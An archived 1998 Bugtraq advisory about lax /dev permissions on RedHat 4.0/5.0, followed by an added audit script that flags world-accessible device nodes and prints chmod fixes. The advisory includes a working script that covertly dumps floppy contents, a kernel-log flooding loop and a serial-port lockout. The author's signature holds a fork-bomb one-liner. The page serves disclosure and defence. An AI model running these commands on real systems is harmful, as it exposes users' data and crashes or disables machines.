Poor device permissions on Redhat 4.0/5.0

Summary
Description: Lax device permissions on RedHat boxes allow unprivileged users to do nasty things such as peeking at the contents of a floppy in your drive or mounting DoS attacks against the system.
Author: Smart List user <slist@cyber.com.au>
Compromise: Local users can read the floppy device, be annoying
Vulnerable Systems: RedHat Linux 4.0 and 5.0
Date: 4 February 1998
Details


Message-Id: <01bd3149$43e38600$a2fb74c3@lcamtuf>
Date: Wed, 4 Feb 1998 09:45:37 +0100
From: Michał Zalewski <lcamtuf@POLBOX.COM>
Subject: RedHat 4.x/5.0 /dev permissions
To: BUGTRAQ@NETSPACE.ORG
Approved: darrenr@cyber.com.au

First one
----------

Any user can read data from a (even unmounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous in itself, but... any user
may write a script which periodically checks whether the floppy has
just been unmounted, then dumps its content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in the drive, an unprivileged user may flood
the kernel log console (the local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to the console (default klogd behaviour). Also,
every printk(...) (called by the fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary users are allowed to read /dev/ttyS*. The serial port driver
disallows multiple access attempts at the same time, so a user may
permanently lock a chosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now the serial port is in an unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
which are world-readable or even world-writable.

There isn't ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain interesting
data or cause a system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
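The post's fix is a one-liner (`ls -l /dev/* | grep "r-- "`, then chmod by hand). The script below is an added example, not part of the original post and not Red Hat's own tooling: it parses `ls -l` output for block and character device nodes whose "other" bits grant read or write, skips a small baseline of nodes every process legitimately needs (the `SAFE_DEVS` list is an assumption for the example), and prints the `chmod o-rw` commands for review rather than running them. It goes slightly beyond the page's grep by also catching world-writable nodes. The `ls -l` listing it checks is constructed for the example, modelled on a RedHat 4.x/5.0 layout, not captured from a real host; `audit_live` runs the same check against the real /dev.

```shell
#!/bin/sh
# Added example, not part of the original post or of Red Hat's tooling:
# audit a /dev listing for block/character device nodes whose "other" bits
# grant read or write, and print the chmod fixes for review.

# Device nodes every process legitimately needs; leave these world-accessible.
# (Hypothetical baseline for the example; adjust per system.)
SAFE_DEVS="null zero tty random urandom ptmx full"

# Constructed sample of `ls -l /dev` output, modelled on a RedHat 4.x/5.0
# layout; not captured from a real host.
SAMPLE_LS='brw-rw-rw-   1 root     floppy     2,  28 May  5  1998 fd0H1440
brw-rw-r--   1 root     floppy     2,   0 May  5  1998 fd0
crw-rw-rw-   1 root     root       1,   3 May  5  1998 null
crw-rw-rw-   1 root     root       5,   0 May  5  1998 tty
crw-rw-r--   1 root     uucp       4,  64 May  5  1998 ttyS0
crw-rw-rw-   1 root     sys       14,   1 May  5  1998 sequencer
crw-------   1 root     root      10,   1 May  5  1998 psaux
-rwxr-xr-x   1 root     root        1024 May  5  1998 MAKEDEV'

# Read `ls -l` lines on stdin; print "name mode" for every block (b) or
# character (c) device whose world-read (column 8) or world-write (column 9)
# bit is set and whose name is not in SAFE_DEVS. Regular files, directories,
# symlinks and the "total" line are ignored because they do not start with b/c.
flag_world_access() {
    awk -v safe="$SAFE_DEVS" '
    BEGIN { n = split(safe, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    /^[bc]/ {
        mode = $1; name = $NF
        if (name in ok) next
        if (substr(mode, 8, 1) == "r" || substr(mode, 9, 1) == "w")
            print name, mode
    }'
}

# Turn the flagged list into chmod commands. They are printed, not executed,
# so an admin can review them first. o-rw touches only the "other" bits, so
# group access (e.g. the "floppy" or "uucp" group) is left as configured.
fix_commands() {
    flag_world_access | awk '{ print "chmod o-rw /dev/" $1 }'
}

# Number of flagged nodes in the constructed sample (used as a self-check).
count_sample_flagged() {
    printf '%s\n' "$SAMPLE_LS" | flag_world_access | wc -l | tr -d ' '
}

# Live, read-only audit of the running system's /dev.
audit_live() {
    ls -l /dev | flag_world_access
}

# Demo on the constructed sample: prints the four chmod lines for
# fd0H1440, fd0, ttyS0 and sequencer; null and tty are skipped.
printf '%s\n' "$SAMPLE_LS" | fix_commands
```

On the sample, `fd0H1440`, `fd0`, `ttyS0` and `sequencer` are flagged (the first three for world-read, `sequencer` for world-read and world-write) while `null` and `tty` are skipped by the baseline and `psaux` passes because its world bits are already clear. Removing the "other" bits while leaving the `floppy` and `uucp` group bits is the same group-based model RedHat used for these nodes, so users who need the floppy or a serial port can still be granted it by group membership.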

This page is part of Fyodor's exploit world.